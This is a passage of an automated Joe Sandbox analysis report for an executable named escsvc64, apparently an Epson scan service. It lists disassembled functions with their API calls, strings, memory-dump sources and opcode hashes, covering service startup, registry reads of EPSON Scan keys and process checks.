Instruction Fuzzy Hash: 46B1CFF360878486F766CE17B6043AE7AE1E75A7D4F240115EF4923AFAD779C8408B48

Function 000000014000420E Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

-, xrefs: 0000000140004564

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: cc105c1c9ce3bac7ae62e62a748aff5b23afc70919c97d87a9511dca8811ff66
Instruction ID: 94e25bba52440a2cca7ea8ee516e65074c5b4943095f1fee069ad109c40d3143
Opcode Fuzzy Hash: cc105c1c9ce3bac7ae62e62a748aff5b23afc70919c97d87a9511dca8811ff66
Instruction Fuzzy Hash: 3AB1BEF260878486FB62CF16B5443AA6BE0F7897D4F140115FF4A13AFADB79C9448B44

Function 0000000140004112 Relevance: 1.5, Strings: 1, Instructions: 210COMMON

Download Yara Rule

Strings

-, xrefs: 0000000140004564

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 97eedac39f7bfedb38e4d82418d8d0a5aad94e2e9198739ae9b92dec815e7bfd
Instruction ID: 64f448d262f21ed941de6c020a9d0f3a60cb7ec8839f9869103a210ec6ba61c5
Opcode Fuzzy Hash: 97eedac39f7bfedb38e4d82418d8d0a5aad94e2e9198739ae9b92dec815e7bfd
Instruction Fuzzy Hash: A89100F2A0878446FB62CE16B5043EA6AE0F7597D4F180115FF49176F6EB79C880CB48

Function 00000001400040A9 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

-, xrefs: 0000000140004564

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 38ad8a242f868f7af08282b4cbf198ccb50b62c679b78f933d7899405d201d8c
Instruction ID: 4da5bba44bb66270887b95eda529c48334dd4f935bc46f25b0db5c7bb74f89e1
Opcode Fuzzy Hash: 38ad8a242f868f7af08282b4cbf198ccb50b62c679b78f933d7899405d201d8c
Instruction Fuzzy Hash: 3E8101F260878486FB62CE16B5043AA7AE0F7497D8F140115FF4A17AF6DB79C840CB48

Function 0000000140004012 Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

-, xrefs: 0000000140004564

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 20d9e0a11a594cb2d75081cad8ba9c6f5020e3f73ed6864717b6a692171ac5b5
Instruction ID: be0ece8c6c099251b535272f2d67437119a85b849efd07fc89c03c42969d6caf
Opcode Fuzzy Hash: 20d9e0a11a594cb2d75081cad8ba9c6f5020e3f73ed6864717b6a692171ac5b5
Instruction Fuzzy Hash: AB81BEF250878486FB62CF16B1043AA7AE0F75A788F144115FF8913AF6DB79C944CB49

Function 0045A230 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c0af3afa3ce2cd943dfd938cfb517e3e80b3f38b163d67ad5b76e19be9c73d
Instruction ID: 44648f02c182beadb8b036353e2636875c16a05d5d4ef3af2416be37cd8575da
Opcode Fuzzy Hash: c6c0af3afa3ce2cd943dfd938cfb517e3e80b3f38b163d67ad5b76e19be9c73d
Instruction Fuzzy Hash: D5B15D3061CB5C4FDB29DB6888495BE77D1FB45712F54035FE886C3293DA289C4A878B

Function 004511A8 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac996540c99712a2732c3a0cd771fdd5b82a7297ebbc67a68a116eb0094e006c
Instruction ID: 70d3a97b670b747bf5a6e9085d796e33e0a35ce39c655d07e696b19d8a097a4a
Opcode Fuzzy Hash: ac996540c99712a2732c3a0cd771fdd5b82a7297ebbc67a68a116eb0094e006c
Instruction Fuzzy Hash: 07B15030A18B488FEB54DF68D8946AE77F1FB98305F10422EE84AD3261DF74D985CB45

Function 0000000180001280 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c3617ae956e6184eb8065b69f6db008006156971f66254c3dd82276b5a9f0f
Instruction ID: 677c0758eb96fa0f58adb50d014ce7746cb49a23bd9658e5ec2e981993f68fea
Opcode Fuzzy Hash: e3c3617ae956e6184eb8065b69f6db008006156971f66254c3dd82276b5a9f0f
Instruction Fuzzy Hash: 24B12D30A18A4C8FEB95DF68D8847EDB7F1FB98345F10822EE44AD3151DF749A858B41

Function 0000000140003040 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09105ba1de81c0eabae60244af1f5e217578faf070f434ce134c4c62d05422bb
Instruction ID: cb9468e5dd3d17a1f1a5f45de5d21e32605364da385cad08a5688e468ff26665
Opcode Fuzzy Hash: 09105ba1de81c0eabae60244af1f5e217578faf070f434ce134c4c62d05422bb
Instruction Fuzzy Hash: 9C31DEB670475042FB27DA67B4117EBA19ABB9C7E8F284125BF5907BE6DE38C8118700

Function 0000000140009660 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ffe5f4428bf9eeef88d2c30132eb356a74c290e10bf32207ccb9b55cee9dc4
Instruction ID: 55cee6301af4064af0a7b8dd5ff135198a46271af006edfdb84eb076825c30f3
Opcode Fuzzy Hash: e0ffe5f4428bf9eeef88d2c30132eb356a74c290e10bf32207ccb9b55cee9dc4
Instruction Fuzzy Hash: 31318DB222465046F367EF37B942B9EAA51A7C87E0F114615BF2A476F7CB7888018B14

Function 0000000140008D00 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0259813f3e940429c9912dbf36fea80308d35746dd903408b396d40507f961b0
Instruction ID: 0e9b1d565009756a5861b1773b79cbb7b290ff6b7f3b08d1189dcf1d4d27c9f8
Opcode Fuzzy Hash: 0259813f3e940429c9912dbf36fea80308d35746dd903408b396d40507f961b0
Instruction Fuzzy Hash: EF319EB221164046F766AF37BA42B9E6A51A7987F0F215716BF79077F3CB3884018718

Function 000000014000F210 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ba4ea63d73a6e75ec1ab626a6aaa22a6c04ea535b2695e22b789f8ff2ae24a
Instruction ID: ca43f0d881ef68448f7dc613d54f2faea86250d2d978d8cd49a0b55ef0f1022f
Opcode Fuzzy Hash: 45ba4ea63d73a6e75ec1ab626a6aaa22a6c04ea535b2695e22b789f8ff2ae24a
Instruction Fuzzy Hash: 5331F8B261024086F317EF77B9917EE7551A7883E0F258629BB2607AF7CF3884009714

Function 00000001400027D0 Relevance: 24.2, APIs: 16, Instructions: 174
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 000000014000280E
SysAllocString.OLEAUT32 ref: 000000014000281E
SysAllocString.OLEAUT32 ref: 000000014000282E
lstrlenW.KERNEL32 ref: 000000014000290F
lstrcpynW.KERNEL32 ref: 0000000140002929
lstrcmpW.KERNEL32 ref: 000000014000293A
lstrcmpW.KERNEL32 ref: 000000014000294F
lstrcmpW.KERNEL32 ref: 0000000140002964
lstrcmpW.KERNEL32 ref: 0000000140002979
SysFreeString.OLEAUT32 ref: 0000000140002990
SysFreeString.OLEAUT32 ref: 000000014000299E
SysFreeString.OLEAUT32 ref: 00000001400029AC
SysFreeString.OLEAUT32 ref: 00000001400029BA
SysFreeString.OLEAUT32 ref: 0000000140002A6C
SysFreeString.OLEAUT32 ref: 0000000140002A75
SysFreeString.OLEAUT32 ref: 0000000140002A7E

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: String$Free$lstrcmp$Alloc$lstrcpynlstrlen
String ID:
API String ID: 1252115942-0
Opcode ID: 03eb1b18c4707c08c21059389df7a0a4c71f297fbe5ad549f874feaa8339716f
Instruction ID: 10d5fb0b984341c209e7259ff63cebb7c5da4f613dd4f39bc1d8205302deed1f
Opcode Fuzzy Hash: 03eb1b18c4707c08c21059389df7a0a4c71f297fbe5ad549f874feaa8339716f
Instruction Fuzzy Hash: 5D711476204B8586EB61DF26E84439AB7A4F789FD4F554022EF8E87B28DF39C449C700

Function 0000000140006BB0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006BD2
GetLastError.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006BEC
GetEnvironmentStringsW.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006C11
FreeEnvironmentStringsW.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006C54
FreeEnvironmentStringsW.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006C72
GetEnvironmentStrings.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006C89
MultiByteToWideChar.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006CB7
FreeEnvironmentStringsA.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006CF3
FreeEnvironmentStringsA.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006D99

Strings

ProgramFiles(x86), xrefs: 0000000140006BBB

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID: ProgramFiles(x86)
API String ID: 1232609184-3631460872
Opcode ID: c37cc93dd8c1a900cb13687d03ad4eb6d5e772f06f7a123cf1ea6dbd35c8654b
Instruction ID: b63bd8ed9ac3dab9224ed48c9e233b2d44c75ae47e14bd980ce9fa98a46d85b3
Opcode Fuzzy Hash: c37cc93dd8c1a900cb13687d03ad4eb6d5e772f06f7a123cf1ea6dbd35c8654b
Instruction Fuzzy Hash: CD51A3B170464045FA62DF33B8447A96792EB4DBE0F080725FFAA977F1EA79C4408301

Function 0000000140001710 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 87servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 0000000140001720
OpenServiceW.ADVAPI32 ref: 000000014000174A
StartServiceW.ADVAPI32 ref: 0000000140001764
QueryServiceStatusEx.ADVAPI32 ref: 000000014000178F
GetTickCount.KERNEL32 ref: 00000001400017AA
Sleep.KERNEL32(?), ref: 00000001400017F4
QueryServiceStatusEx.ADVAPI32 ref: 0000000140001817
GetTickCount.KERNEL32 ref: 0000000140001827
GetTickCount.KERNEL32 ref: 0000000140001835
CloseServiceHandle.ADVAPI32 ref: 0000000140001852
CloseServiceHandle.ADVAPI32 ref: 000000014000186F

Strings

EpsonScanSvc, xrefs: 0000000140001732

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Service$CountTick$CloseHandleOpenQueryStatus$ManagerSleepStart
String ID: EpsonScanSvc
API String ID: 1984259928-1444984947
Opcode ID: f3d182e5e534bf6b48d903bd0ac76c9d6b4826b5f6df23701516f99d534de01c
Instruction ID: a7f394007434b1b02e697beb098547fb0025df285e32183c449bfbd724071357
Opcode Fuzzy Hash: f3d182e5e534bf6b48d903bd0ac76c9d6b4826b5f6df23701516f99d534de01c
Instruction Fuzzy Hash: 5B314B7130969186FBA6DF17B84479A63A1F7CDBC0F148015FB8E47AA8CE39C645CB00

Function 0000000140001960 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 190registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00000001400019A7
RegEnumKeyExW.ADVAPI32 ref: 00000001400019FB
RegOpenKeyExW.ADVAPI32 ref: 0000000140001A91
RegQueryValueExW.ADVAPI32 ref: 0000000140001AD0
lstrlenW.KERNEL32 ref: 0000000140001B2A
RegCloseKey.ADVAPI32 ref: 0000000140001B37
RegEnumKeyExW.ADVAPI32 ref: 0000000140001C3A
RegCloseKey.ADVAPI32 ref: 0000000140001C55

Strings

Supported, xrefs: 0000000140001AA9
SOFTWARE\WOW6432Node\EPSON\EPSON Scan, xrefs: 0000000140001988

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: CloseEnumOpen$QueryValuelstrlen
String ID: SOFTWARE\WOW6432Node\EPSON\EPSON Scan$Supported
API String ID: 2486029594-1622175670
Opcode ID: 87ad4f67b9b781d28baa77e7320f6897fffe9f52e03f0c83eb102f117d29a89b
Instruction ID: 8e4f15a3a503a55ddbbdac29224ee9fe645b7f6789ebbbbd2d6754d1847acb3f
Opcode Fuzzy Hash: 87ad4f67b9b781d28baa77e7320f6897fffe9f52e03f0c83eb102f117d29a89b
Instruction Fuzzy Hash: D5818076715B8182EB62CF26F4507EAB3A4F7C97C8F504116EB8907AA4EF79C519CB00

Function 000000014000A3B0 Relevance: 16.9, APIs: 11, Instructions: 355COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A41A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A42A
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A4E4
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A591
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A5B4
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A5FD
LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A694
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A6D5
LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A783
LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A836
LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A8BC

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 60cc79fb6dc40bda5f948520c0e7e0d2ff632d05875a93aef8353d7857435f43
Instruction ID: 5f3b594da2a3d9375c03c46df1faf838da500cf477c195cfbbe80b2a65d6330f
Opcode Fuzzy Hash: 60cc79fb6dc40bda5f948520c0e7e0d2ff632d05875a93aef8353d7857435f43
Instruction Fuzzy Hash: B1E1ADB26007808AEB66CF26B8407E977E1F74DBE8F448615FB6947BE9DB78C5418700

Function 0000000140002300 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 91stringsynchronizationCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000001400023C7
EnumProcessModules.PSAPI ref: 00000001400023E8
GetModuleBaseNameW.PSAPI ref: 0000000140002407
lstrcmpiW.KERNEL32 ref: 000000014000241F
WaitForSingleObject.KERNEL32 ref: 0000000140002431
CloseHandle.KERNEL32 ref: 0000000140002441

Strings

<unknown>, xrefs: 0000000140002380
EsDevApp.exe, xrefs: 0000000140002410

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Process$BaseCloseEnumHandleModuleModulesNameObjectOpenSingleWaitlstrcmpi
String ID: <unknown>$EsDevApp.exe
API String ID: 3347754066-197797983
Opcode ID: 531f60bc9a968f6c4e8abcd5da6a658d7eb65ae74af477b5c7ef866473c81541
Instruction ID: 6cfe2537a428b480afb9f9cbeed3f753b1c7f8177941936a06842b6620a5b642
Opcode Fuzzy Hash: 531f60bc9a968f6c4e8abcd5da6a658d7eb65ae74af477b5c7ef866473c81541
Instruction Fuzzy Hash: F0416071304A8182EB26DB16F4503EA6391FB8C7C8F844126EB8D57BA5DE3DC246C740

Function 0000000140006020 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 79libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?,?,0000000140006208,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140006046
GetModuleHandleA.KERNEL32 ref: 0000000140006089
GetProcAddress.KERNEL32 ref: 00000001400060D8
GetProcAddress.KERNEL32 ref: 00000001400060F0

Strings

.mixcrt, xrefs: 00000001400060B0
KERNEL32.DLL, xrefs: 000000014000603F
EncodePointer, xrefs: 00000001400060CE
DecodePointer, xrefs: 00000001400060E6

Memory Dump Source

Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: .mixcrt$DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1646373207-1161742486
Opcode ID: e729c7a7b6060703b922ff775d9c5f5377de67280fac83615df89c31571cf52b
Instruction ID: ab796fa72a7d5732366149f6b830d43232af647d3f7bfa51478b0964a882ca94
Opcode Fuzzy Hash: e729c7a7b6060703b922ff775d9c5f5377de67280fac83615df89c31571cf52b
Instruction Fuzzy Hash: 1E315872201BA191EB56DB22E848BEB73A5F7487C4F404125EB8D57370EFB9C549C704

Function 004549DC Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 460COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00454A39

Part of subcall function 00456D9C: __GetUnwindTryBlock.LIBCMT ref: 00456DDF
Part of subcall function 00456D9C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00456E04

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00454B11
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00454D5F
std::bad_alloc::bad_alloc.LIBCMT ref: 00454E6C

Strings

csm, xrefs: 00454ABA
csm, xrefs: 00454A53
csm, xrefs: 00454B34

Memory Dump Source

Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 0c4b8d619ca458689e2f74fd3b4ee5de20de0ba7d33cc5e2b3dde7c6a46069a9
Instruction ID: c01b3ce48d01e08d648ae61beddcf9329edb62d70e729643493ad16dd0a7b3f4
Opcode Fuzzy Hash: 0c4b8d619ca458689e2f74fd3b4ee5de20de0ba7d33cc5e2b3dde7c6a46069a9
Instruction Fuzzy Hash: D4E19730518B088FDB54EF68C4866A977E0FB9831AF50465FE849C7253DB38E989C786

Function 0000000180004AB4 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 460COMMON

Download Yara Rule

APIs

